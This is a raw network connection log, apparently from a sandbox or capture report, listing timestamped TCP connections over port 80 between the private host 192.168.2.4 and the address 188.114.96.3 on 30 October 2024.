                                                        Oct 30, 2024 05:23:22.774600029 CET4995980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:22.779925108 CET8049959188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:23.120866060 CET4995980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:23.126321077 CET8049959188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:23.369278908 CET8049959188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:23.417656898 CET4995980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:23.481281996 CET4995980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:23.482279062 CET4996380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:23.486989975 CET8049959188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:23.487041950 CET4995980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:23.487622023 CET8049963188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:23.487694025 CET4996380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:23.487828016 CET4996380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:23.493065119 CET8049963188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:23.603358984 CET4996580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:23.608707905 CET8049965188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:23.608784914 CET4996580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:23.608897924 CET4996580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:23.614162922 CET8049965188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:23.839660883 CET4996380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:23.846316099 CET8049963188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:23.846337080 CET8049963188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:23.964682102 CET4996580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:23.970690012 CET8049965188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:24.094664097 CET8049963188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:24.152072906 CET4996380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:24.228070974 CET8049965188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:24.277045965 CET4996580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:24.408994913 CET8049963188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:24.421516895 CET8049965188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:24.421561003 CET8049965188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:24.421648979 CET4996580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:24.464554071 CET4996380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:24.539722919 CET4996380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:24.539877892 CET4996580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:24.540674925 CET4997080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:24.545965910 CET8049963188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:24.546041012 CET4996380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:24.546185970 CET8049970188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:24.546258926 CET4997080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:24.546519995 CET4997080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:24.546561003 CET8049965188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:24.546614885 CET4996580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:24.552299023 CET8049970188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:24.902158022 CET4997080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:24.907708883 CET8049970188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:25.142275095 CET8049970188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:25.183346987 CET4997080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:25.343456984 CET8049970188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:25.386413097 CET4997080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:25.481271029 CET4997680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:25.486639977 CET8049976188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:25.486730099 CET4997680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:25.486816883 CET4997680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:25.492094994 CET8049976188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:25.839690924 CET4997680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:25.845052958 CET8049976188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:26.091653109 CET8049976188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:26.136442900 CET4997680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:26.285461903 CET8049976188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:26.339551926 CET4997680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:26.398530006 CET4997680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:26.399466038 CET4998380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:26.404515028 CET8049976188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:26.404572010 CET4997680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:26.404830933 CET8049983188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:26.404906034 CET4998380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:26.405018091 CET4998380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:26.410310984 CET8049983188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:26.761555910 CET4998380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:26.767076969 CET8049983188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:27.002424002 CET8049983188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:27.042711020 CET4998380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:27.328603029 CET8049983188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:27.370798111 CET4998380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:27.453687906 CET4998380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:27.455425978 CET4999080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:27.460288048 CET8049983188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:27.460342884 CET4998380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:27.460841894 CET8049990188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:27.460911989 CET4999080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:27.461026907 CET4999080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:27.466293097 CET8049990188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:27.808382988 CET4999080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:27.813832998 CET8049990188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:28.067584038 CET8049990188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:28.120836973 CET4999080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:28.265152931 CET8049990188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:28.308322906 CET4999080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:28.385340929 CET4999080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:28.386243105 CET4999680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:28.391235113 CET8049990188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:28.391683102 CET8049996188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:28.391762972 CET4999080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:28.391805887 CET4999680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:28.391906977 CET4999680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:28.397250891 CET8049996188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:28.745898008 CET4999680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:28.751395941 CET8049996188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:29.012952089 CET8049996188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:29.058317900 CET4999680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:29.218380928 CET8049996188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:29.261495113 CET4999680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:29.331163883 CET4997080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:29.335990906 CET4999680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:29.336779118 CET5000280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:29.342266083 CET8050002188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:29.342350960 CET8049996188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:29.342365026 CET5000280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:29.342403889 CET4999680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:29.342559099 CET5000280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:29.347868919 CET8050002188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:29.418677092 CET5000280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:29.419564962 CET5000380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:29.424989939 CET8050003188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:29.425074100 CET5000380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:29.425164938 CET5000380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:29.430490017 CET8050003188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:29.470773935 CET8050002188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:29.536856890 CET5000580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:29.542196989 CET8050005188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:29.542265892 CET5000580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:29.542385101 CET5000580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:29.547662020 CET8050005188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:29.777234077 CET5000380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:29.782536983 CET8050003188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:29.782656908 CET8050003188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:29.826170921 CET8050002188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:29.826246977 CET5000280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:29.886553049 CET5000580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:29.891992092 CET8050005188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:30.013386965 CET8050003188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:30.058342934 CET5000380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:30.141432047 CET8050005188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:30.183408022 CET5000580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:30.319641113 CET8050003188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:30.357450962 CET8050005188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:30.370836973 CET5000380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:30.402077913 CET5000580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:30.478017092 CET5000380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:30.478054047 CET5000580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:30.479317904 CET5001180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:30.483679056 CET8050003188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:30.483768940 CET5000380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:30.484083891 CET8050005188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:30.484136105 CET5000580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:30.484699965 CET8050011188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:30.484771967 CET5001180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:30.484951019 CET5001180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:30.490308046 CET8050011188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:30.839778900 CET5001180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:30.845267057 CET8050011188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:31.089333057 CET8050011188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:31.136441946 CET5001180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:31.392759085 CET8050011188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:31.448950052 CET5001180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:31.523296118 CET4978880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:31.523399115 CET4979680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:31.526107073 CET5001180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:31.527278900 CET5001780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:31.531807899 CET8050011188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:31.531860113 CET5001180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:31.532686949 CET8050017188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:31.532763958 CET5001780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:31.532834053 CET5001780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:31.538186073 CET8050017188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:31.886759043 CET5001780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:31.892287016 CET8050017188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:32.183770895 CET8050017188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:32.230205059 CET5001780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:32.356081009 CET8050017188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:32.402066946 CET5001780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:32.476214886 CET5002580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:32.481549025 CET8050025188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:32.481609106 CET5002580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:32.481703997 CET5002580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:32.487056017 CET8050025188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:32.839766979 CET5002580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:32.845117092 CET8050025188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:33.102971077 CET8050025188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:33.152065992 CET5002580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:33.274669886 CET8050025188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:33.323946953 CET5002580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:33.398214102 CET5002580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:33.398874044 CET5003180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:33.403909922 CET8050025188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:33.403963089 CET5002580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:33.404175997 CET8050031188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:33.404243946 CET5003180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:33.404351950 CET5003180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:33.410080910 CET8050031188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:33.761533976 CET5003180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:33.767009020 CET8050031188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:33.994044065 CET8050031188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:34.044579029 CET5003180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:34.194804907 CET8050031188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:34.245837927 CET5003180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:34.319907904 CET5003780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:34.319919109 CET5003180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:34.325376987 CET8050037188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:34.325694084 CET8050031188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:34.325793982 CET5003780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:34.325797081 CET5003180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:34.325889111 CET5003780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:34.331190109 CET8050037188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:34.684597969 CET5003780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:34.690224886 CET8050037188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:34.957293034 CET8050037188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:35.011446953 CET5003780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:35.275758028 CET8050037188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:35.318211079 CET5003780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:35.327053070 CET5001780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:35.327357054 CET5003780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:35.328327894 CET5004480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:35.333085060 CET8050037188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:35.333132982 CET5003780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:35.333745003 CET8050044188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:35.333811045 CET5004480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:35.333918095 CET5004480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:35.339159966 CET8050044188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:35.405253887 CET5004480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:35.405363083 CET5004580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:35.410726070 CET8050045188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:35.410788059 CET5004580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:35.410902977 CET5004580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:35.416184902 CET8050045188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:35.450784922 CET8050044188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:35.763493061 CET5004580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:35.768863916 CET8050045188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:35.821120024 CET8050044188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:35.824851036 CET5004480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:36.005520105 CET8050045188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:36.060579062 CET5004580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:36.320442915 CET8050045188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:36.371594906 CET5004580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:36.448601007 CET5005180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:36.448617935 CET5004580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:36.454086065 CET8050051188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:36.454449892 CET8050045188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:36.454571009 CET5005180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:36.454586983 CET5004580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:36.457453966 CET5005180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:36.462757111 CET8050051188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:36.809007883 CET5005180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:36.814418077 CET8050051188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:37.048707962 CET8050051188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:37.089580059 CET5005180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:37.361608982 CET8050051188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:37.402084112 CET5005180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:37.479492903 CET5005180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:37.483403921 CET5005780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:37.485129118 CET8050051188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:37.485191107 CET5005180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:37.488719940 CET8050057188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:37.488776922 CET5005780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:37.489413023 CET5005780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:37.495613098 CET8050057188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:37.842703104 CET5005780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:37.848292112 CET8050057188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:38.077231884 CET8050057188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:38.124597073 CET5005780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:38.275430918 CET8050057188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:38.324114084 CET5005780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:38.398096085 CET5006480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:38.403407097 CET8050064188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:38.403691053 CET5006480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:38.403841972 CET5006480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:38.409121037 CET8050064188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:38.763668060 CET5006480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:38.768928051 CET8050064188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:39.205126047 CET8050064188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:39.218796968 CET8050064188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:39.218892097 CET5006480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:39.227893114 CET8050064188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:39.228015900 CET5006480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:39.355830908 CET5006480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:39.356412888 CET5007080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:39.361418009 CET8050064188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:39.361465931 CET5006480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:39.361713886 CET8050070188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:39.361782074 CET5007080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:39.361871958 CET5007080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:39.367165089 CET8050070188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:39.714701891 CET5007080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:39.720169067 CET8050070188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:39.966705084 CET8050070188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:40.016613007 CET5007080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:40.178066015 CET8050070188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:40.232603073 CET5007080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:40.304604053 CET5007680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:40.304605007 CET5007080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:40.310153008 CET8050076188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:40.310470104 CET8050070188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:40.310579062 CET5007080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:40.310584068 CET5007680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:40.310731888 CET5007680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:40.316046953 CET8050076188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:40.419051886 CET5007680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:40.424602032 CET5007880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:40.429904938 CET8050078188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:40.430170059 CET5007880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:40.430283070 CET5007880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:40.435553074 CET8050078188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:40.470880032 CET8050076188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:40.546974897 CET5008280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:40.552244902 CET8050082188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:40.554807901 CET5008280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:40.555111885 CET5008280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:40.560441971 CET8050082188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:40.777316093 CET5007880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:40.782987118 CET8050078188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:40.783020020 CET8050078188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:40.787631989 CET8050076188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:40.791030884 CET5007680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:40.902273893 CET5008280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:40.907689095 CET8050082188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:41.033451080 CET8050078188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:41.073988914 CET5007880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:41.160141945 CET8050082188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:41.214595079 CET5008280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:41.247637033 CET8050078188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:41.247664928 CET8050078188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:41.247724056 CET5007880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:41.353987932 CET8050082188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:41.354083061 CET8050082188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:41.354123116 CET5008280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:41.481662989 CET5007880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:41.481719017 CET5008280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:41.483144045 CET5008880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:41.487338066 CET8050078188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:41.487391949 CET5007880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:41.487718105 CET8050082188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:41.487762928 CET5008280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:41.488588095 CET8050088188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:41.488641977 CET5008880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:41.488814116 CET5008880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:41.494189024 CET8050088188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:41.842777967 CET5008880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:41.848181009 CET8050088188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:42.084770918 CET8050088188.114.96.3192.168.2.4
